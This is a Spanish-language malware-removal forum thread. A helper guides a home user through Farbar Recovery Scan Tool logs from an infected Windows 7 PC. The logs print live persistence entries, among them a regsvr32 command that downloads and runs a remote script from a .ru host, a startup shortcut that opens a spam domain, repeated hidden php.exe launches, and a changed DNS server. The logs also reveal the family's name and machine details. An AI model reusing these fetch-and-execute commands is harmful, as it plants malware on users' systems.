BHO: E-Web Print -> {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} -> C:\Program Files\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office12\GrooveShellExtensions.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_181\bin\ssv.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2016-09-12] (Google Inc -> Google Inc.)
BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_181\bin\jp2ssv.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
Toolbar: HKLM - E-Web Print - {201CF130-E29C-4E5C-A73F-CD197DEFA6AE} - C:\Program Files\Epson Software\E-Web Print\ewps_tb.dll [2014-11-27] (SEIKO EPSON CORPORATION -> SEIKO EPSON CORPORATION)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2016-09-12] (Google Inc -> Google Inc.)
Toolbar: HKU\S-1-5-21-1692793609-910991690-2205039242-1000 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll [2016-09-12] (Google Inc -> Google Inc.)
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\Program Files\Microsoft Office\Office12\GrooveSystemServices.dll [2006-10-27] (Microsoft Corporation -> Microsoft Corporation)

FireFox:
========
FF DefaultProfile: dqwbx6g2.default
FF ProfilePath: C:\Users\Familia Landaeta\AppData\Roaming\Mozilla\Firefox\Profiles\dqwbx6g2.default [2020-04-20]
FF Homepage: Mozilla\Firefox\Profiles\dqwbx6g2.default -> hxxp://www.google.com/
FF Extension: (Search and New Tab by Yahoo) - C:\Users\Familia Landaeta\AppData\Roaming\Mozilla\Firefox\Profiles\dqwbx6g2.default\Extensions\[email protected] [2017-04-10] [Heredado]
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files\Epson Software\E-Web Print\Firefox Add-on
FF Extension: (E-Web Print) - C:\Program Files\Epson Software\E-Web Print\Firefox Add-on [2016-10-09] [Heredado] [no firmado]
FF Plugin: @java.com/DTPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\dtplugin\npDeployJava1.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=11.181.2 -> C:\Program Files\Java\jre1.8.0_181\bin\plugin2\npjp2.dll [2018-07-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN -> VideoLAN)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-06-29] (Adobe Systems, Incorporated -> Adobe Systems Inc.)

Chrome: 
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default [2020-04-20]
CHR NewTab: Default ->  Not-active:"chrome-extension://dobeegjfclcaalnakkicjhgcbmjcghbp/newtab/newtab.html"
CHR DefaultSearchURL: Default -> hxxps://es.search.yahoo.com/search?p={searchTerms}&fr=yset_chr_syc_oracle&type=default
CHR DefaultSearchKeyword: Default -> Yahoo
CHR DefaultSuggestURL: Default -> hxxps://es.search.yahoo.com/sugg/ie?output=fxjson&command={searchTerms}&nResults=10
CHR Extension: (Presentaciones) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-02-08]
CHR Extension: (Documentos) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2018-02-08]
CHR Extension: (Google Drive) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-12]
CHR Extension: (YouTube) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-09-12]
CHR Extension: (TV Hero) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\dobeegjfclcaalnakkicjhgcbmjcghbp [2020-04-16]
CHR Extension: (Adobe Acrobat) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2020-04-16]
CHR Extension: (Hojas de cálculo) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-02-08]
CHR Extension: (Documentos de Google sin conexión) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2020-04-16]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2020-04-16]
CHR Extension: (Gmail) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-05-07]
CHR Extension: (Chrome Media Router) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-04-17]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Guest Profile [2018-11-24]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1 [2018-11-24]
CHR Extension: (Presentaciones de Google) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-12-08]
CHR Extension: (Google Docs) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2016-12-08]
CHR Extension: (Google Drive) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-12-08]
CHR Extension: (YouTube) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-12-08]
CHR Extension: (Hojas de cálculo de Google) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-12-08]
CHR Extension: (Documentos de Google sin conexión) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-12-08]
CHR Extension: (Sistema de pagos de Chrome Web Store) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-12-08]
CHR Extension: (Gmail) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-12-08]
CHR Extension: (Chrome Media Router) - C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-12-08]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 2 [2018-07-11]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 3 [2018-11-24]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 5 [2018-07-11]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 6 [2018-07-11]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\Profile 7 [2018-07-11]
CHR Profile: C:\Users\Familia Landaeta\AppData\Local\Google\Chrome\User Data\System Profile [2018-11-24]
CHR HKLM\...\Chrome\Extension: [ibbfklbaljofpaanmpaeadejijfdddco]
CHR HKU\S-1-5-21-1692793609-910991690-2205039242-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]

==================== Servicios (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

S2 EpsonScanSvc; C:\Windows\system32\EscSvc.exe [122000 2011-12-12] (SEIKO EPSON Corporation -> Seiko Epson Corporation)
S2 EPSON_PM_RPCV4_05; C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_JT50RP.EXE [142432 2012-02-27] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [680960 2013-05-27] (Microsoft Windows -> Microsoft Corporation)

===================== Controladores (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

S3 hamachi; C:\Windows\System32\DRIVERS\hamachi.sys [27040 2017-03-02] (LogMeIn, Inc. -> LogMeIn, Inc.)
S3 RimUsb; C:\Windows\System32\Drivers\RimUsb.sys [22656 2007-05-14] (Microsoft Windows Hardware Compatibility Publisher -> Research In Motion Limited)
S3 RTL8167; C:\Windows\System32\DRIVERS\Rt86win7.sys [139776 2009-07-13] (Microsoft Windows -> Realtek Corporation )
S3 wdm_usb; C:\Windows\System32\DRIVERS\usb2ser.sys [128704 2016-08-16] (NGO -> MBB)
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 XDva511; \??\C:\Windows\system32\XDva511.sys [X]

==================== NetSvcs (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)


==================== Un mes (creado) ===================

(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

2020-04-20 13:02 - 2020-04-20 13:03 - 000021132 _____ C:\Users\Familia Landaeta\Downloads\FRST.txt
2020-04-20 13:02 - 2020-04-20 13:02 - 000000965 _____ C:\Users\Public\Desktop\CCleaner.lnk
2020-04-20 13:02 - 2020-04-20 13:02 - 000000965 _____ C:\ProgramData\Desktop\CCleaner.lnk
2020-04-20 13:02 - 2020-04-20 13:02 - 000000300 ____H C:\Windows\Tasks\CCleaner Update.job
2020-04-20 13:02 - 2020-04-20 13:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2020-04-20 13:01 - 2020-04-20 13:03 - 000000000 ____D C:\FRST
2020-04-20 13:00 - 2020-04-20 13:03 - 000137562 _____ C:\Windows\ntbtlog.txt
2020-04-20 12:20 - 2020-04-20 12:28 - 002009600 _____ (Farbar) C:\Users\Familia Landaeta\Downloads\FRST.exe
2020-04-20 08:59 - 2020-04-20 09:03 - 022267336 _____ (Piriform Software Ltd) C:\Users\Familia Landaeta\Downloads\ccsetup565 (1).exe
2020-04-19 18:31 - 2020-04-19 18:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Highresolution Enterprises
2020-04-19 18:31 - 2020-04-19 18:31 - 000000000 ____D C:\Program Files\Highresolution Enterprises
2020-04-19 18:28 - 2020-04-19 18:31 - 002713952 _____ C:\Users\Familia Landaeta\Downloads\x-mouse-button-control-2-19.exe
2020-04-17 11:34 - 2020-04-17 16:45 - 022267336 _____ (Piriform Software Ltd) C:\Users\Familia Landaeta\Downloads\ccsetup565.exe
2020-04-17 06:31 - 2020-04-17 06:31 - 000000000 _____ C:\Users\Familia Landaeta\AppData\Local\php.zip
2020-04-16 11:01 - 2020-04-16 15:58 - 000002238 _____ C:\Users\Public\Desktop\League of Legends.lnk
2020-04-16 11:01 - 2020-04-16 15:58 - 000002238 _____ C:\ProgramData\Desktop\League of Legends.lnk
2020-04-16 10:38 - 2020-04-16 11:08 - 000000000 ____D C:\Users\Familia Landaeta\Desktop\Riot Games
2020-04-16 10:38 - 2020-04-16 11:01 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Riot Games
2020-04-16 10:38 - 2020-04-16 10:38 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Riot Games
2020-04-16 10:32 - 2020-04-16 19:09 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\Riot Games
2020-04-16 10:03 - 2020-04-16 10:17 - 068993192 _____ (Riot Games, Inc.) C:\Users\Familia Landaeta\Downloads\Install League of Legends la1.exe

==================== Un mes (modificado) ==================

(Si una entrada es incluida en el fixlist, el archivo/carpeta será eliminado/a.)

2020-04-20 13:02 - 2018-11-19 11:24 - 000096768 ___SH C:\Users\Familia Landaeta\Documents\Thumbs.db
2020-04-20 13:02 - 2016-09-12 11:40 - 000000000 ____D C:\Program Files\CCleaner
2020-04-20 13:01 - 2019-02-05 08:42 - 000121344 ___SH C:\Users\Familia Landaeta\Desktop\Thumbs.db
2020-04-20 13:01 - 2018-11-21 13:14 - 000164352 ___SH C:\Users\Familia Landaeta\Downloads\Thumbs.db
2020-04-20 13:00 - 2009-07-14 00:34 - 000022528 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2020-04-20 13:00 - 2009-07-14 00:34 - 000022528 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2020-04-20 12:51 - 2019-02-05 08:51 - 000000000 ___HD C:\Users\Familia Landaeta\AppData\Local\aoxfre
2020-04-20 12:19 - 2009-07-13 22:37 - 000000000 ____D C:\Windows\tracing
2020-04-20 08:57 - 2009-07-14 00:53 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-04-19 18:32 - 2016-10-17 10:44 - 000000000 ____D C:\Users\Familia Landaeta\Desktop\Games
2020-04-19 14:11 - 2016-09-12 11:42 - 000004050 _____ C:\Windows\system32\Tasks\User_Feed_Synchronization-{6BA31EE6-0E9C-4B23-991B-FCF4330E17DB}
2020-04-19 11:25 - 2018-02-08 17:11 - 000004464 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
2020-04-18 08:12 - 2018-12-04 09:02 - 000000000 ____D C:\Users\Familia Landaeta\Desktop\Pendrive
2020-04-16 16:51 - 2016-09-12 11:46 - 000002168 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-04-16 11:07 - 2016-09-21 12:10 - 000000000 ____D C:\ProgramData\Riot Games
2020-04-16 10:37 - 2018-03-13 00:16 - 000000000 ____D C:\Users\Familia Landaeta\Documents\Discord
2020-04-16 10:20 - 2016-09-12 11:35 - 000003524 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2020-04-16 10:20 - 2016-09-12 11:35 - 000003396 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2020-04-16 10:19 - 2016-09-12 11:35 - 000000000 ____D C:\Program Files\Google
2020-04-16 09:57 - 2009-07-13 22:37 - 000000000 ____D C:\Windows\inf
2020-04-16 09:42 - 2009-07-13 22:37 - 000000000 ____D C:\Windows\system32\NDF
2020-04-16 09:23 - 2019-04-13 03:35 - 000000000 ____D C:\Users\Familia Landaeta\AppData\Local\ElevatedDiagnostics
2020-04-08 17:01 - 2017-01-22 15:53 - 000000000 ____D C:\Program Files\Counter-Strike 1.6

==================== Archivos en la raíz de algunos directorios ========

2020-04-17 06:31 - 2020-04-17 06:31 - 000000000 _____ () C:\Users\Familia Landaeta\AppData\Local\php.zip
2016-12-15 03:13 - 2016-12-15 03:14 - 000000000 _____ () C:\Users\Familia Landaeta\AppData\Local\{42A7229B-167F-4CEB-928F-88DF4E1A435E}

==================== SigCheck ============================

(No existe una corrección automática para los archivos que no pasan la verificación.)


LastRegBack: 2020-04-19 13:05
==================== Final de FRST.txt ========================

Hello

Another log is missing, the Frst.txt…

Also, it was stated with heavy emphasis that it had to be run from the Desktop, and not from a folder.

Paste the other log, and cut and paste FRST.exe onto the Desktop.

Also, from what I can see, CCleaner is installed, or at least it appears among the programs… go to drive C: > Program Files > CCleaner, run Ccleaner.exe directly and tell me whether it opens.

You probably saw CCleaner because I installed it in safe mode; however, it didn't run.

Here are the logs

Resultado del análisis realizado por Farbar Recovery Scan Tool (FRST) (x86) Versión: 19-04-2020
Ejecutado por Familia Landaeta (administrador) sobre FAMILIALANDAETA (Hewlett-Packard HP 500B Microtower) (22-04-2020 11:47:21)
Ejecutado desde C:\Users\Familia Landaeta\Desktop
Perfiles cargados: Familia Landaeta (Perfiles disponibles: Familia Landaeta)
Platform: Microsoft Windows 7 Ultimate  Service Pack 1 (X86) Idioma: Español (España, internacional)
Internet Explorer Versión 11 (Navegador predeterminado: Chrome)
Modo de Inicio: Safe Mode (minimal)
Tutorial para Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Procesos (Lista blanca) =================

(Si una entrada es incluida en el fixlist, el proceso será cerrado. El archivo no será movido.)

(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe

==================== Registro (Lista blanca) ===================

(Si una entrada es incluida en el fixlist, el elemento del registro será restaurado a su valor predeterminado o será eliminado. El archivo no será movido.)

HKLM\...\Run: [GrooveMonitor] => C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-27] (Microsoft Corporation -> Microsoft Corporation)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [601424 2018-07-07] (Oracle America, Inc. -> Oracle Corporation)
HKLM\...\Run: [XMouseButtonControl] => C:\Program Files\Highresolution Enterprises\X-Mouse Button Control\XMouseButtonControl.exe [1346848 2020-02-09] (Open Source Developer, Phillip Gibbons -> Highresolution Enterprises)
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [Akamai NetSession Interface] => C:\Users\Familia Landaeta\AppData\Local\Akamai\netsession_win.exe [4586456 2018-04-17] (Akamai Technologies, Inc. -> Akamai Technologies, Inc.)
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.39slxu3bw.ru/restore.xml scrobj.dll <==== ATENCIÓN
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [wmwrdqj] => C:\Users\Familia Landaeta\AppData\Local\aoxfre\obbtgsrn.exe [141824 2013-10-11] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php0] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php1] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php2] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php3] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php4] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php5] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php6] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php7] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php8] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [php9] => "C:\Users\Familia Landaeta\AppData\Local\php7\php.exe" "C:\Users\Familia Landaeta\AppData\Local\php7\php.php"
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Run: [Steam] => C:\Program Files\Steam\steam.exe [3371296 2020-04-03] (Valve -> Valve Corporation)
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Policies\Explorer: [TaskbarNoNotification] 0
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\...\MountPoints2: {3ce42c48-38d5-11e8-849d-78acc0bd591b} - E:\Setup.exe
HKU\S-1-5-21-1692793609-910991690-2205039242-1000\Control Panel\Desktop\\SCRNSAVE.EXE -> C:\Windows\system32\Mystify.scr [221184 2010-11-20] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files\Google\Chrome\Application\81.0.4044.113\Installer\chrmstp.exe [2020-04-20] (Google LLC -> Google LLC)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{A6EADE66-0000-0000-484E-7E8A45000000}] -> C:\Program Files\Adobe\Acrobat Reader DC\Esl\AiodLite.dll [2018-06-29] (Adobe Systems, Incorporated -> Adobe Systems, Inc.)
Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Recorte de pantalla e Inicio rápido de OneNote 2007.lnk [2016-10-06]
ShortcutTarget: Recorte de pantalla e Inicio rápido de OneNote 2007.lnk -> C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\user.lnk [2020-04-17]
ShortcutAndArgument: user.lnk -> C:\Windows\System32\cmd.exe => /c explorer hxxp://www2.savemax.store/
Startup: C:\Users\Familia Landaeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xiwlwq.lnk [2020-04-22]
ShortcutTarget: xiwlwq.lnk -> C:\Users\Familia Landaeta\AppData\Local\aoxfre\obbtgsrn.exe (Microsoft Windows -> Microsoft Corporation)
BootExecute: autocheck autochk /p \??\F:autocheck autochk * 

==================== Tareas programadas (Lista blanca) ============

(Si una entrada es incluida en el fixlist, será eliminada del registro. El archivo no se moverá a menos que sea añadido al listado por separado.)

Task: {1F3AC100-06D5-4A79-ACEB-822B7917AF2F} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [154440 2016-09-12] (Google Inc -> Google Inc.)
Task: {268EE322-C696-4C2A-ADED-73EEE65E5919} - System32\Tasks\{33D029CD-E2EB-4BBF-840D-05EE30782182} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon\eauninstall.exe" -d "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon"
Task: {4D752A87-53D3-4FDE-856C-14DA2FE85B25} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1195544 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
Task: {4F752C9C-8039-4148-94E7-17E0424FB331} - System32\Tasks\{B578D2A0-8F24-4C93-B6F3-0E29139E5C47} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\Warcraft III\SetupReg.exe" -d "C:\Users\Familia Landaeta\Documents\Warcraft III"
Task: {65B18C1F-B953-43BD-B364-B3652C2ACD60} - System32\Tasks\{D3E37D6B-A5F9-4EBD-83FD-1DE5065FB775} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon\setup.exe" -d "C:\Users\Familia Landaeta\Documents\Need for Speed Carbon"
Task: {672FBA20-83CF-4151-8163-DE75916F4816} - System32\Tasks\{0C16381D-B4C5-4BFB-B0DE-23B539A738D3} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {A6C8DED6-B773-4517-BF76-B6538CD4434C} - System32\Tasks\{FE65F450-8DDE-41FF-8B71-F2B53B14CB22} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Desktop\Hitman 1\directx7\dxsetup.exe" -d "C:\Users\Familia Landaeta\Desktop\Hitman 1\directx7"
Task: {AB5506EA-16C8-46C4-9F8E-4B7ED9BA87EA} - System32\Tasks\{568A21DE-A13A-462D-94F2-3A85694880BF} => C:\Windows\system32\pcalua.exe -a C:\Users\FAMILI~1\AppData\Local\Temp\jre-8u161-windows-au.exe -d C:\Windows\system32 -c /installmethod=jau FAMILYUPGRADE=1 <==== ATENCIÓN
Task: {AD5C2F40-438A-4391-8C94-3D407E01EF45} - System32\Tasks\{8E6B5861-4FEB-40B7-AA9A-A940302A2D7E} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {CCB34560-3404-4CE5-9DAB-6B46BCB23E2D} - System32\Tasks\{B9641373-3BD3-45E5-A647-78413E924EF2} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\HDGHDFG\Eidos Interactive\Pyro\Commandos\MPLAYER\mplaynow.exe" -d "C:\Users\Familia Landaeta\Documents\HDGHDFG\Eidos Interactive\Pyro\Commandos\MPLAYER"
Task: {D6A3E4BB-CBD0-4187-9DCC-3D6F403A10BE} - System32\Tasks\{57FB3682-2104-4F36-8579-4DC3DC47852F} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Documents\DownloaderPWCZ\PWCZ_ClienteCompleto_v139\install.exe" -d "C:\Users\Familia Landaeta\Documents\DownloaderPWCZ\PWCZ_ClienteCompleto_v139"
Task: {DAD5D05F-49AA-4561-BCB6-CF36DEC9F03F} - System32\Tasks\{BDC282FB-7E2B-40AD-B6A1-10CE822F66CB} => C:\Windows\system32\pcalua.exe -a "C:\Users\Familia Landaeta\Desktop\Counter-Strike 1.6\unins000.exe" -d "C:\Users\Familia Landaeta\Desktop\Counter-Strike 1.6"
Task: {DC289D95-95B2-4999-9194-C785C844D430} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [154440 2016-09-12] (Google Inc -> Google Inc.)
Task: {E292CC29-6E23-428B-A8A9-8B353DCB0242} - System32\Tasks\{27B6EE2D-9F7D-4816-8664-F8C35923C977} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {EB26897C-3B5C-4277-B0BC-C6842F8F6430} - System32\Tasks\{B695C6D3-B08B-4889-8983-0E883F2B1BD2} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {EF2ECF57-BD80-471F-B663-4A9C03A36584} - System32\Tasks\{8C3C6385-93E2-4818-A124-0E0FECD10D73} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]
Task: {FB402BC5-78F6-4A55-937B-E6AEEE83C91C} - System32\Tasks\{71A43D0C-6750-4381-ACFE-5879AE010440} => C:\Users\Familia Landaeta\Documents\counter strike\gta_sa.exe [14386176 2005-07-07] () [Archivo no firmado]

(Si una entrada es incluida en el fixlist, el archivo de tarea (.job) será movido. El archivo que está siendo ejecutado por la tarea no será movido.)

Task: C:\Windows\Tasks\CCleaner Update.job => C:\Program Files\CCleaner\CCUpdate.exe

==================== Internet (Lista blanca) ====================

(Si un elemento es incluido en el fixlist, y éste pertenece al registro, será eliminado o restaurado a su valor predeterminado.)

Hosts: Hay más de una entrada en Hosts. Consulte la sección Hosts de Addition.txt
Tcpip\Parameters: [DhcpNameServer] 37.120.145.234 8.8.8.8
Tcpip\..\Interfaces\{6657F0B0-4452-44DD-8333-C6955B9AC142}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{6CBAB555-2BC9-4266-B7B7-0CBF840B2538}: [DhcpNameServer] 37.120.145.234 8.8.8.8
Tcpip\..\Interfaces\{7C7F7E39-7E43-45F1-9777-5354FEA74937}: [DhcpNameServer] 192.168.42.129

Internet Explorer:
==================
